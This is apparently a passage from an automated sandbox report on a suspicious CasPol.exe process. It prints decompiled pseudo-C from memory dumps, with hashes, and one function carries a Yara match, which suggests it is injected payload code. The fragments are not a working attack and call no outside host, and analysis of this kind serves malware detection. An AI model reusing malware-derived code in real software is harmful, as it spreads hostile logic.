                                                                								_t75 = 0;
                                                                								_t73 = 4;
                                                                								_v60 =  &_v68;
                                                                								_v52 = _t73;
                                                                								_v36 = _t73;
                                                                								_t74 = _v76;
                                                                								_v44 =  &_v72;
                                                                								 *0x1718774 = 1;
                                                                								_v56 = 0;
                                                                								_v28 = _t74[2];
                                                                								_v48 = 0;
                                                                								_v20 = ( *_t74 & 0x0000ffff) + 2;
                                                                								_v40 = 0;
                                                                								_v32 = 0;
                                                                								_v24 = 0;
                                                                								_v16 = 0;
                                                                								if(E0162B6F0(0x160c338, 0x160c288, 3,  &_v60) == 0) {
                                                                									_v80 = _v80 | 0xffffffff;
                                                                									_push( &_v84);
                                                                									_push(0);
                                                                									_push(_v64);
                                                                									_v84 = 0xfa0a1f00;
                                                                									E01669520();
                                                                								}
                                                                							}
                                                                						}
                                                                					}
                                                                				}
                                                                				if(_v64 != 0) {
                                                                					_push(_v64);
                                                                					E016695D0();
                                                                					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
                                                                					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
                                                                				}
                                                                				if(_t77 != 0) {
                                                                					E0163FFB0(_t68, _t77, 0x1718778);
                                                                				}
                                                                				_pop(_t78);
                                                                				return E0166B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
                                                                 			}

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b2f39a433b092f0bc9ba6a9906bd18fdacab3b56ffccc57c9090f7f3ac773e40
                                                                • Instruction ID: e9bb99948151cd92979d9eeca490d7355e9c83f9ef6d8f7532f3f0e07200fac3
                                                                • Opcode Fuzzy Hash: b2f39a433b092f0bc9ba6a9906bd18fdacab3b56ffccc57c9090f7f3ac773e40
                                                                • Instruction Fuzzy Hash: 98417DB1D00209AFDB24CFA9D940BEEBBF9EF48714F18812EE915A3240DB70A905CF55
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E00403853(signed char* __eax) {
                                                                				signed char* _t37;
                                                                				unsigned int _t65;
                                                                				unsigned int _t73;
                                                                				unsigned int _t81;
                                                                				unsigned int _t88;
                                                                				signed char _t94;
                                                                				signed char _t97;
                                                                				signed char _t100;
                                                                
                                                                				_t37 = __eax;
                                                                				_t65 = ((((__eax[0xc] & 0x000000ff) << 0x00000008 | __eax[0xd] & 0x000000ff) & 0x0000ffff) << 0x00000008 | __eax[0xe] & 0xff) << 0x00000007 | (__eax[0xf] & 0x000000ff) >> 0x00000001;
                                                                				_t94 = __eax[0xb];
                                                                				if((_t94 & 0x00000001) != 0) {
                                                                					_t65 = _t65 | 0x80000000;
                                                                				}
                                                                				_t37[0xc] = _t65 >> 0x18;
                                                                				_t37[0xf] = _t65;
                                                                				_t37[0xd] = _t65 >> 0x10;
                                                                				_t73 = ((((_t37[8] & 0x000000ff) << 0x00000008 | _t37[9] & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t37[0xa] & 0xff) << 0x00000007 | (_t94 & 0x000000ff) >> 0x00000001;
                                                                				_t97 = _t37[7];
                                                                				_t37[0xe] = _t65 >> 8;
                                                                				if((_t97 & 0x00000001) != 0) {
                                                                					_t73 = _t73 | 0x80000000;
                                                                				}
                                                                				_t37[8] = _t73 >> 0x18;
                                                                				_t37[0xb] = _t73;
                                                                				_t37[9] = _t73 >> 0x10;
                                                                				_t81 = ((((_t37[4] & 0x000000ff) << 0x00000008 | _t37[5] & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t37[6] & 0xff) << 0x00000007 | (_t97 & 0x000000ff) >> 0x00000001;
                                                                				_t100 = _t37[3];
                                                                				_t37[0xa] = _t73 >> 8;
                                                                				if((_t100 & 0x00000001) != 0) {
                                                                					_t81 = _t81 | 0x80000000;
                                                                				}
                                                                				_t37[4] = _t81 >> 0x18;
                                                                				_t37[7] = _t81;
                                                                				_t37[5] = _t81 >> 0x10;
                                                                				_t88 = (((_t37[1] & 0x000000ff) << 0x00000008 | _t37[2] & 0x000000ff) & 0x00ffffff | ( *_t37 & 0x000000ff) << 0x00000010) << 0x00000007 | (_t100 & 0x000000ff) >> 0x00000001;
                                                                				 *_t37 = _t88 >> 0x18;
                                                                				_t37[1] = _t88 >> 0x10;
                                                                				_t37[6] = _t81 >> 8;
                                                                				_t37[2] = _t88 >> 8;
                                                                				_t37[3] = _t88;
                                                                				return _t37;
                                                                 			}

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                                                • Instruction ID: e31d20633b43231726eebcedc7cabc7f2bcd3dedc8b658de99dff7b92833012d
                                                                • Opcode Fuzzy Hash: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                                                • Instruction Fuzzy Hash: F83172526586F14ED31E836D08BD675AEC18E9720174EC2FEDADA6F2F3C4988408D3A5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 85%
                                                                			E01625210(intOrPtr _a4, void* _a8) {
                                                                				void* __ecx;
                                                                				intOrPtr _t31;
                                                                				signed int _t32;
                                                                				signed int _t33;
                                                                				intOrPtr _t35;
                                                                				signed int _t52;
                                                                				void* _t54;
                                                                				void* _t56;
                                                                				unsigned int _t59;
                                                                				signed int _t60;
                                                                				void* _t61;
                                                                
                                                                				_t61 = E016252A5(1);
                                                                				if(_t61 == 0) {
                                                                					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
                                                                					_t54 =  *((intOrPtr*)(_t31 + 0x28));
                                                                					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
                                                                				} else {
                                                                					_t54 =  *((intOrPtr*)(_t61 + 0x10));
                                                                					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
                                                                				}
                                                                				_t60 = _t59 >> 1;
                                                                				_t32 = 0x3a;
                                                                				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
                                                                					_t52 = _t60 + _t60;
                                                                					if(_a4 > _t52) {
                                                                						goto L5;
                                                                					}
                                                                					if(_t61 != 0) {
                                                                						asm("lock xadd [esi], eax");
                                                                						if((_t32 | 0xffffffff) == 0) {
                                                                							_push( *((intOrPtr*)(_t61 + 4)));
                                                                							E016695D0();
                                                                							L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                                                                						}
                                                                					} else {
                                                                						E0163EB70(_t54, 0x17179a0);
                                                                					}
                                                                					_t26 = _t52 + 2; // 0xddeeddf0
                                                                					return _t26;
                                                                				} else {
                                                                					_t52 = _t60 + _t60;
                                                                					if(_a4 < _t52) {
                                                                						if(_t61 != 0) {
                                                                							asm("lock xadd [esi], eax");
                                                                							if((_t32 | 0xffffffff) == 0) {
                                                                								_push( *((intOrPtr*)(_t61 + 4)));
                                                                								E016695D0();
                                                                								L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                                                                							}
                                                                						} else {
                                                                							E0163EB70(_t54, 0x17179a0);
                                                                						}
                                                                						return _t52;
                                                                					}
                                                                					L5:
                                                                					_t33 = E0166F3E0(_a8, _t54, _t52);
                                                                					if(_t61 == 0) {
                                                                						E0163EB70(_t54, 0x17179a0);
                                                                					} else {
                                                                						asm("lock xadd [esi], eax");
                                                                						if((_t33 | 0xffffffff) == 0) {
                                                                							_push( *((intOrPtr*)(_t61 + 4)));
                                                                							E016695D0();
                                                                							L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                                                                						}
                                                                					}
                                                                					_t35 = _a8;
                                                                					if(_t60 <= 1) {
                                                                						L9:
                                                                						_t60 = _t60 - 1;
                                                                						 *((short*)(_t52 + _t35 - 2)) = 0;
                                                                						goto L10;
                                                                					} else {
                                                                						_t56 = 0x3a;
                                                                						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
                                                                							 *((short*)(_t52 + _t35)) = 0;
                                                                							L10:
                                                                							return _t60 + _t60;
                                                                						}
                                                                						goto L9;
                                                                					}
                                                                				}
                                                                			}















                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 14437c80797a5babf0538ab6dd06cf6d66fa9943d668dc4ba0a8d10529c66173
                                                                • Instruction ID: c12f3f649fc2dc3ec54c059bff25649f1bce5a6036106f3114a0bf3665a60b33
                                                                • Opcode Fuzzy Hash: 14437c80797a5babf0538ab6dd06cf6d66fa9943d668dc4ba0a8d10529c66173
                                                                • Instruction Fuzzy Hash: 6131F632242A11EBC736AF18CC51B7A77A6FF50760F118B1EF9560B2D0DB70E805CA94
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E01663D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
                                                                				intOrPtr _v8;
                                                                				char _v12;
                                                                				signed short** _t33;
                                                                				short* _t38;
                                                                				intOrPtr* _t39;
                                                                				intOrPtr* _t41;
                                                                				signed short _t43;
                                                                				intOrPtr* _t47;
                                                                				intOrPtr* _t53;
                                                                				signed short _t57;
                                                                				intOrPtr _t58;
                                                                				signed short _t60;
                                                                				signed short* _t61;
                                                                
                                                                				_t47 = __ecx;
                                                                				_t61 = __edx;
                                                                				_t60 = ( *__ecx & 0x0000ffff) + 2;
                                                                				if(_t60 > 0xfffe) {
                                                                					L22:
                                                                					return 0xc0000106;
                                                                				}
                                                                				if(__edx != 0) {
                                                                					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
                                                                						L5:
                                                                						E01637B60(0, _t61, 0x16011c4);
                                                                						_v12 =  *_t47;
                                                                						_v12 = _v12 + 0xfff8;
                                                                						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
                                                                						E01637B60(0xfff8, _t61,  &_v12);
                                                                						_t33 = _a8;
                                                                						if(_t33 != 0) {
                                                                							 *_t33 = _t61;
                                                                						}
                                                                						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                						_t53 = _a12;
                                                                						if(_t53 != 0) {
                                                                							_t57 = _t61[2];
                                                                							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
                                                                							while(_t38 >= _t57) {
                                                                								if( *_t38 == 0x5c) {
                                                                									_t41 = _t38 + 2;
                                                                									if(_t41 == 0) {
                                                                										break;
                                                                									}
                                                                									_t58 = 0;
                                                                									if( *_t41 == 0) {
                                                                										L19:
                                                                										 *_t53 = _t58;
                                                                										goto L7;
                                                                									}
                                                                									 *_t53 = _t41;
                                                                									goto L7;
                                                                								}
                                                                								_t38 = _t38 - 2;
                                                                							}
                                                                							_t58 = 0;
                                                                							goto L19;
                                                                						} else {
                                                                							L7:
                                                                							_t39 = _a16;
                                                                							if(_t39 != 0) {
                                                                								 *_t39 = 0;
                                                                								 *((intOrPtr*)(_t39 + 4)) = 0;
                                                                								 *((intOrPtr*)(_t39 + 8)) = 0;
                                                                								 *((intOrPtr*)(_t39 + 0xc)) = 0;
                                                                							}
                                                                							return 0;
                                                                						}
                                                                					}
                                                                					_t61 = _a4;
                                                                					if(_t61 != 0) {
                                                                						L3:
                                                                						_t43 = L01644620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
                                                                						_t61[2] = _t43;
                                                                						if(_t43 == 0) {
                                                                							return 0xc0000017;
                                                                						}
                                                                						_t61[1] = _t60;
                                                                						 *_t61 = 0;
                                                                						goto L5;
                                                                					}
                                                                					goto L22;
                                                                				}
                                                                				_t61 = _a4;
                                                                				if(_t61 == 0) {
                                                                					return 0xc000000d;
                                                                				}
                                                                				goto L3;
                                                                			}

















                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8a58165d3801414cf2da3fff85398030b66b16727c48a8d55b7b7e398948ae8d
                                                                • Instruction ID: 86f95f46861f53f161892f2ec75555627b9cb0b39123253187e3ebb95f8b96ad
                                                                • Opcode Fuzzy Hash: 8a58165d3801414cf2da3fff85398030b66b16727c48a8d55b7b7e398948ae8d
                                                                • Instruction Fuzzy Hash: A6318D32A05615DBDB29CF2DCC41A7ABBB9FF95710B05806EE94ACB360E730D841C7A1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 78%
                                                                			E0165A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                                				intOrPtr _t35;
                                                                				intOrPtr _t39;
                                                                				intOrPtr _t45;
                                                                				intOrPtr* _t51;
                                                                				intOrPtr* _t52;
                                                                				intOrPtr* _t55;
                                                                				signed int _t57;
                                                                				intOrPtr* _t59;
                                                                				intOrPtr _t68;
                                                                				intOrPtr* _t77;
                                                                				void* _t79;
                                                                				signed int _t80;
                                                                				intOrPtr _t81;
                                                                				char* _t82;
                                                                				void* _t83;
                                                                
                                                                				_push(0x24);
                                                                				_push(0x1700220);
                                                                				E0167D08C(__ebx, __edi, __esi);
                                                                				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
                                                                				_t79 = __ecx;
                                                                				_t35 =  *0x1717b9c; // 0x0
                                                                				_t55 = L01644620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
                                                                				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
                                                                				if(_t55 == 0) {
                                                                					_t39 = 0xc0000017;
                                                                					L11:
                                                                					return E0167D0D1(_t39);
                                                                				}
                                                                				_t68 = 0;
                                                                				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
                                                                				 *(_t83 - 4) =  *(_t83 - 4) & 0;
                                                                				_t7 = _t55 + 8; // 0x8
                                                                				_t57 = 6;
                                                                				memcpy(_t7, _t79, _t57 << 2);
                                                                				_t80 = 0xfffffffe;
                                                                				 *(_t83 - 4) = _t80;
                                                                				if(0 < 0) {
                                                                					L14:
                                                                					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
                                                                					L20:
                                                                					L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
                                                                					_t39 = _t81;
                                                                					goto L11;
                                                                				}
                                                                				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
                                                                					_t81 = 0xc000007b;
                                                                					goto L20;
                                                                				}
                                                                				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
                                                                					_t59 =  *((intOrPtr*)(_t83 + 8));
                                                                					_t45 =  *_t59;
                                                                					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
                                                                					 *_t59 = _t45 + 1;
                                                                					L6:
                                                                					 *(_t83 - 4) = 1;
                                                                					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
                                                                					 *(_t83 - 4) = _t80;
                                                                					if(_t68 < 0) {
                                                                						_t82 =  *((intOrPtr*)(_t83 + 0xc));
                                                                						if(_t82 == 0) {
                                                                							goto L14;
                                                                						}
                                                                						asm("btr eax, ecx");
                                                                						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
                                                                						if( *_t82 != 0) {
                                                                							 *0x1717b10 =  *0x1717b10 - 8;
                                                                						}
                                                                						goto L20;
                                                                					}
                                                                					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
                                                                					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
                                                                					_t51 =  *0x171536c; // 0x77995368
                                                                					if( *_t51 != 0x1715368) {
                                                                						_push(3);
                                                                						asm("int 0x29");
                                                                						goto L14;
                                                                					}
                                                                					 *_t55 = 0x1715368;
                                                                					 *((intOrPtr*)(_t55 + 4)) = _t51;
                                                                					 *_t51 = _t55;
                                                                					 *0x171536c = _t55;
                                                                					_t52 =  *((intOrPtr*)(_t83 + 0x10));
                                                                					if(_t52 != 0) {
                                                                						 *_t52 = _t55;
                                                                					}
                                                                					_t39 = 0;
                                                                					goto L11;
                                                                				}
                                                                				_t77 =  *((intOrPtr*)(_t83 + 8));
                                                                				_t68 = E0165A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
                                                                				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
                                                                				if(_t68 < 0) {
                                                                					goto L14;
                                                                				}
                                                                				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
                                                                				goto L6;
                                                                			}



















                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 87c64a3f56efb37293c3b431969811a9f33368f33f85c0a00836374687b01671
                                                                • Instruction ID: a58e880d58d7f6a085324fc579b6c4d8935fa6a40542da33aaad111e7ba61f2b
                                                                • Opcode Fuzzy Hash: 87c64a3f56efb37293c3b431969811a9f33368f33f85c0a00836374687b01671
                                                                • Instruction Fuzzy Hash: B7416CB5A00215DFCB19CF98C890BAABBF6BF89314F15C1ADE905AB344C779A901CF54
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 68%
                                                                			E0164C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
                                                                				signed int* _v8;
                                                                				char _v16;
                                                                				void* __ebx;
                                                                				void* __edi;
                                                                				signed char _t33;
                                                                				signed char _t43;
                                                                				signed char _t48;
                                                                				signed char _t62;
                                                                				void* _t63;
                                                                				intOrPtr _t69;
                                                                				intOrPtr _t71;
                                                                				unsigned int* _t82;
                                                                				void* _t83;
                                                                
                                                                				_t80 = __ecx;
                                                                				_t82 = __edx;
                                                                				_t33 =  *((intOrPtr*)(__ecx + 0xde));
                                                                				_t62 = _t33 >> 0x00000001 & 0x00000001;
                                                                				if((_t33 & 0x00000001) != 0) {
                                                                					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
                                                                					if(E01647D50() != 0) {
                                                                						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                					} else {
                                                                						_t43 = 0x7ffe0386;
                                                                					}
                                                                					if( *_t43 != 0) {
                                                                						_t43 = E016F8D34(_v8, _t80);
                                                                					}
                                                                					E01642280(_t43, _t82);
                                                                					if( *((char*)(_t80 + 0xdc)) == 0) {
                                                                						E0163FFB0(_t62, _t80, _t82);
                                                                						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
                                                                						_t30 = _t80 + 0xd0; // 0xd0
                                                                						_t83 = _t30;
                                                                						E016F8833(_t83,  &_v16);
                                                                						_t81 = _t80 + 0x90;
                                                                						E0163FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
                                                                						_t63 = 0;
                                                                						_push(0);
                                                                						_push(_t83);
                                                                						_t48 = E0166B180();
                                                                						if(_a4 != 0) {
                                                                							E01642280(_t48, _t81);
                                                                						}
                                                                					} else {
                                                                						_t69 = _v8;
                                                                						_t12 = _t80 + 0x98; // 0x98
                                                                						_t13 = _t69 + 0xc; // 0x575651ff
                                                                						E0164BB2D(_t13, _t12);
                                                                						_t71 = _v8;
                                                                						_t15 = _t80 + 0xb0; // 0xb0
                                                                						_t16 = _t71 + 8; // 0x8b000cc2
                                                                						E0164BB2D(_t16, _t15);
                                                                						E0164B944(_v8, _t62);
                                                                						 *((char*)(_t80 + 0xdc)) = 0;
                                                                						E0163FFB0(0, _t80, _t82);
                                                                						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
                                                                						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
                                                                						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
                                                                						 *(_t80 + 0xde) = 0;
                                                                						if(_a4 == 0) {
                                                                							_t25 = _t80 + 0x90; // 0x90
                                                                							E0163FFB0(0, _t80, _t25);
                                                                						}
                                                                						_t63 = 1;
                                                                					}
                                                                					return _t63;
                                                                				}
                                                                				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
                                                                				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
                                                                				if(_a4 == 0) {
                                                                					_t24 = _t80 + 0x90; // 0x90
                                                                					E0163FFB0(0, __ecx, _t24);
                                                                				}
                                                                				return 0;
                                                                			}

















                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                • Instruction ID: bdf4f7f2b704c463eeb7fc25edea346d327bf76fbd0a6976b6094f3a6c387357
                                                                • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                • Instruction Fuzzy Hash: 1F310372A06547BBD705EBB8CC90BEAFB59BF52204F04815ED41C87301DB346A0AD7A5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 76%
                                                                			E016A7016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
                                                                				signed int _v8;
                                                                				char _v588;
                                                                				intOrPtr _v592;
                                                                				intOrPtr _v596;
                                                                				signed short* _v600;
                                                                				char _v604;
                                                                				short _v606;
                                                                				void* __ebx;
                                                                				void* __edi;
                                                                				void* __esi;
                                                                				signed short* _t55;
                                                                				void* _t56;
                                                                				signed short* _t58;
                                                                				signed char* _t61;
                                                                				char* _t68;
                                                                				void* _t69;
                                                                				void* _t71;
                                                                				void* _t72;
                                                                				signed int _t75;
                                                                
                                                                				_t64 = __edx;
                                                                				_t77 = (_t75 & 0xfffffff8) - 0x25c;
                                                                				_v8 =  *0x171d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
                                                                				_t55 = _a16;
                                                                				_v606 = __ecx;
                                                                				_t71 = 0;
                                                                				_t58 = _a12;
                                                                				_v596 = __edx;
                                                                				_v600 = _t58;
                                                                				_t68 =  &_v588;
                                                                				if(_t58 != 0) {
                                                                					_t71 = ( *_t58 & 0x0000ffff) + 2;
                                                                					if(_t55 != 0) {
                                                                						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
                                                                					}
                                                                				}
                                                                				_t8 = _t71 + 0x2a; // 0x28
                                                                				_t33 = _t8;
                                                                				_v592 = _t8;
                                                                				if(_t71 <= 0x214) {
                                                                					L6:
                                                                					 *((short*)(_t68 + 6)) = _v606;
                                                                					if(_t64 != 0xffffffff) {
                                                                						asm("cdq");
                                                                						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
                                                                						 *((char*)(_t68 + 0x28)) = _a4;
                                                                						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
                                                                						 *((char*)(_t68 + 0x29)) = _a8;
                                                                						if(_t71 != 0) {
                                                                							_t22 = _t68 + 0x2a; // 0x2a
                                                                							_t64 = _t22;
                                                                							E016A6B4C(_t58, _t22, _t71,  &_v604);
                                                                							if(_t55 != 0) {
                                                                								_t25 = _v604 + 0x2a; // 0x2a
                                                                								_t64 = _t25 + _t68;
                                                                								E016A6B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
                                                                							}
                                                                							if(E01647D50() == 0) {
                                                                								_t61 = 0x7ffe0384;
                                                                							} else {
                                                                								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                							}
                                                                							_push(_t68);
                                                                							_push(_v592 + 0xffffffe0);
                                                                							_push(0x402);
                                                                							_push( *_t61 & 0x000000ff);
                                                                							E01669AE0();
                                                                						}
                                                                					}
                                                                					_t35 =  &_v588;
                                                                					if( &_v588 != _t68) {
                                                                						_t35 = L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
                                                                					}
                                                                					L16:
                                                                					_pop(_t69);
                                                                					_pop(_t72);
                                                                					_pop(_t56);
                                                                					return E0166B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
                                                                				}
                                                                				_t68 = L01644620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
                                                                				if(_t68 == 0) {
                                                                					goto L16;
                                                                				} else {
                                                                					_t58 = _v600;
                                                                					_t64 = _v596;
                                                                					goto L6;
                                                                				}
                                                                			}

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d708b0c87178e01334ee6799366e375b52f7a7e3027546d3e3559e3578a8ddb8
                                                                • Instruction ID: 9b4af6fc2025217220cae8000656d442f31ff24be348c7979f62059efa766b8e
                                                                • Opcode Fuzzy Hash: d708b0c87178e01334ee6799366e375b52f7a7e3027546d3e3559e3578a8ddb8
                                                                • Instruction Fuzzy Hash: 4C31B1726047919BC320DF68CC50A6AB7EABF98700F444A2DF99587790E731ED14CBA6
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 70%
                                                                			E016D3D40(intOrPtr __ecx, char* __edx) {
                                                                				signed int _v8;
                                                                				char* _v12;
                                                                				intOrPtr _v16;
                                                                				intOrPtr _v20;
                                                                				signed char _v24;
                                                                				char _v28;
                                                                				char _v29;
                                                                				intOrPtr* _v32;
                                                                				char _v36;
                                                                				char _v37;
                                                                				void* __ebx;
                                                                				void* __edi;
                                                                				void* __esi;
                                                                				signed char _t34;
                                                                				intOrPtr* _t37;
                                                                				intOrPtr* _t42;
                                                                				intOrPtr* _t47;
                                                                				intOrPtr* _t48;
                                                                				intOrPtr* _t49;
                                                                				char _t51;
                                                                				void* _t52;
                                                                				intOrPtr* _t53;
                                                                				char* _t55;
                                                                				char _t59;
                                                                				char* _t61;
                                                                				intOrPtr* _t64;
                                                                				void* _t65;
                                                                				char* _t67;
                                                                				void* _t68;
                                                                				signed int _t70;
                                                                
                                                                				_t62 = __edx;
                                                                				_t72 = (_t70 & 0xfffffff8) - 0x1c;
                                                                				_v8 =  *0x171d360 ^ (_t70 & 0xfffffff8) - 0x0000001c;
                                                                				_t34 =  &_v28;
                                                                				_v20 = __ecx;
                                                                				_t67 = __edx;
                                                                				_v24 = _t34;
                                                                				_t51 = 0;
                                                                				_v12 = __edx;
                                                                				_v29 = 0;
                                                                				_v28 = _t34;
                                                                				E01642280(_t34, 0x1718a6c);
                                                                				_t64 =  *0x1715768; // 0x77995768
                                                                				if(_t64 != 0x1715768) {
                                                                					while(1) {
                                                                						_t8 = _t64 + 8; // 0x77995770
                                                                						_t42 = _t8;
                                                                						_t53 = _t64;
                                                                						 *_t42 =  *_t42 + 1;
                                                                						_v16 = _t42;
                                                                						E0163FFB0(_t53, _t64, 0x1718a6c);
                                                                						 *0x171b1e0(_v24, _t67);
                                                                						if( *((intOrPtr*)( *((intOrPtr*)(_t64 + 0xc))))() != 0) {
                                                                							_v37 = 1;
                                                                						}
                                                                						E01642280(_t45, 0x1718a6c);
                                                                						_t47 = _v28;
                                                                						_t64 =  *_t64;
                                                                						 *_t47 =  *_t47 - 1;
                                                                						if( *_t47 != 0) {
                                                                							goto L8;
                                                                						}
                                                                						if( *((intOrPtr*)(_t64 + 4)) != _t53) {
                                                                							L10:
                                                                							_push(3);
                                                                							asm("int 0x29");
                                                                						} else {
                                                                							_t48 =  *((intOrPtr*)(_t53 + 4));
                                                                							if( *_t48 != _t53) {
                                                                								goto L10;
                                                                							} else {
                                                                								 *_t48 = _t64;
                                                                								_t61 =  &_v36;
                                                                								 *((intOrPtr*)(_t64 + 4)) = _t48;
                                                                								_t49 = _v32;
                                                                								if( *_t49 != _t61) {
                                                                									goto L10;
                                                                								} else {
                                                                									 *_t53 = _t61;
                                                                									 *((intOrPtr*)(_t53 + 4)) = _t49;
                                                                									 *_t49 = _t53;
                                                                									_v32 = _t53;
                                                                									goto L8;
                                                                								}
                                                                							}
                                                                						}
                                                                						L11:
                                                                						_t51 = _v29;
                                                                						goto L12;
                                                                						L8:
                                                                						if(_t64 != 0x1715768) {
